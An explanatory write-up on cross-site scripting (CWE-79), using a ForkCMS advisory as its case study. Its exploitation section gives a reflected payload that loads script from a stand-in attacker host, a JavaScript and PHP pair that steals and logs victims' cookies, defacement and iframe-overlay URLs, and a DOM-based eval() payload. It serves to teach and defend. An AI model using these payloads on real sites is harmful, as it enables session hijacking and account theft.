Cross-Site Scripting — XSS [CWE-79] — The Hacktivists

1. Description
………………………………

The weakness occurs when software does not perform, or incorrectly performs, neutralization of user-controllable input before that input is placed in a page displayed in a user's browser. As a result, an attacker is able to inject and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Based on where the injected data originates and where it is rendered, cross-site scripting errors are commonly divided into three main types: reflected XSS, stored XSS and DOM-based XSS.

2. Potential impact
………………………………

After a successful attack, a malicious user can perform various actions in the victim's browser: steal the user's cookies, modify webpage contents, and perform operations on the site within the user's session (XSS proxy).

3. Attack patterns
………………………………

The following attack patterns can leverage a cross-site scripting vulnerability, according to the CAPEC (Common Attack Pattern Enumeration and Classification) classification:

4. Affected software
………………………………

Any software that uses HTML to display data is potentially vulnerable to this weakness: web applications, browsers, ActiveX controls, browser plugins, email and RSS clients, frontends for hardware solutions, etc.

5. Exploitation Examples
………………………………

We will use a vulnerability in ForkCMS, described in the HTB23075 security advisory (CVE-2012-1188), as an example of this weakness and show two different attacks against the vulnerable application.

First attack: the reflected `type` parameter of the error page is used to load a script from the attacker's host:

http://forkcms.local/private/en/error?type=%3Cscript%20src=http://attackersite.com/fork.js%3E%3C/script%3E

fork.js, the script loaded by that payload. It builds a hidden form in the victim's page and posts the victim's cookies to the attacker's server:

```javascript
function post_to_url(path, params, method) {
  // Build a form pointing at the receiving script
  var form = document.createElement("form");
  form.setAttribute("method", method);
  form.setAttribute("action", path);
  // Single hidden field carrying the stolen data
  var hiddenField = document.createElement("input");
  hiddenField.setAttribute("type", "hidden");
  hiddenField.setAttribute("name", "1");
  hiddenField.setAttribute("value", params);
  form.appendChild(hiddenField);
  document.body.appendChild(form);
  // Submitting navigates the victim's browser to the attacker's server
  form.submit();
}
post_to_url("http://attackersite.com/fork.php", document.cookie, "post");
```

fork.php, the receiving side on the attacker's server. It appends the posted data to a text file and redirects the victim back to the application so nothing looks unusual:

```php
<?php
// file_put_contents() accepts an array and writes its elements joined together
file_put_contents($_SERVER["DOCUMENT_ROOT"]."/fork.txt",$_POST,FILE_APPEND);
file_put_contents($_SERVER["DOCUMENT_ROOT"]."/fork.txt","\r\n",FILE_APPEND);
header("Location: http://forkcms.local/private/en/");
exit;
?>
```

Second attack: the same parameter is used to overlay the whole page, either with injected markup (defacement) or with a full-page iframe loaded from the attacker's site:

http://forkcms.local/private/en/error?type=%3C/div%3E%3Cdiv%20style=%22color:white;font:75px%20arial;position:absolute;left:0;top:0;background:black;width:100%;height:888px; border:1px%20solid;z-index:1000%22%3E%3Ccenter%3EXSS%3C/div%3E

http://forkcms.local/private/en/error?type=%3C/div%3E%3Ciframe%20src=%22http://www.attacker-site.com/file.html%22%20style=%22border=0;z-index:1000;position:absolute;left:0;top:0;height:100%;width:100%;%22%3E%3C/iframe%3E

DOM-based XSS: the application fetches a contact list from the server as JSON, for example:

```json
{"OnlineUsers": "4", "UserAndStatus": ["User1, Online", "User2, Online", "User3, Online", "User4, Busy"]}
```

and the client-side code turns the response into an object with eval() instead of a JSON parser:

```javascript
var http_request = new XMLHttpRequest();
var Contacts;
http_request.open("GET", url, true);
http_request.onreadystatechange = function () {
  if (http_request.readyState == 4) {
    if (http_request.status == 200) {
      // eval() executes the response text as JavaScript, not just as data
      Contacts = eval("(" + http_request.responseText + ")");
    }
    http_request = null;
  }
};
http_request.send(null);
```

A status value that closes the JSON object and appends script is therefore executed in the user's browser:

Busy"});alert("DOM based XSS");//
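As an added example (not code from the advisory or from ForkCMS), the DOM-based case above reduced to a round trip in plain JavaScript: a contact-list response built by string concatenation and parsed with eval(), beside the same data serialized with JSON.stringify() and read with JSON.parse(). The server-side rendering functions, the status list and the stand-in alert() are assumptions made for the demonstration.

```javascript
// Constructed sample data: the last status carries the payload shown above.
const statuses = ["User1, Online", "User2, Online", "User3, Online",
  'User4, Busy"]});alert("DOM based XSS");//'];

// Assumed vulnerable server side: values are pasted into the JSON text verbatim.
function renderByConcat(list) {
  return '{"OnlineUsers": "' + list.length + '", "UserAndStatus": ["' +
    list.join('", "') + '"]}';
}

// Hardened server side: the serializer escapes quotes and brackets for us.
function renderWithStringify(list) {
  return JSON.stringify({ OnlineUsers: String(list.length), UserAndStatus: list });
}

// Stand-in for the browser's alert(): records each call so we can count them.
const alertCalls = [];
globalThis.alert = (msg) => alertCalls.push(msg);

// The sink used by the page's client code: eval() runs whatever the text contains.
function parseWithEval(text) {
  return eval("(" + text + ")");
}

// Hardened client side: JSON.parse() accepts data only and throws on anything else.
function parseWithJsonParse(text) {
  return JSON.parse(text);
}

// One server-to-client round trip; reports the parsed object, any parser error,
// and how many times the injected script managed to call alert().
function roundTrip(render, parse) {
  alertCalls.length = 0;
  let contacts = null, error = null;
  try {
    contacts = parse(render(statuses));
  } catch (e) {
    error = e.name;
  }
  return { contacts, error, alerts: alertCalls.length };
}
```

Only the concatenation plus eval() combination runs the payload; JSON.parse() rejects the tampered text with a SyntaxError, and JSON.stringify() output is harmless with either parser.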

6. Severity and CVSS Scoring
………………………………

Cross-site scripting affects the integrity and confidentiality of data and requires some user interaction (users must visit a specially crafted page or follow a malicious link). It should be scored as follows:
6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N] — Medium severity.
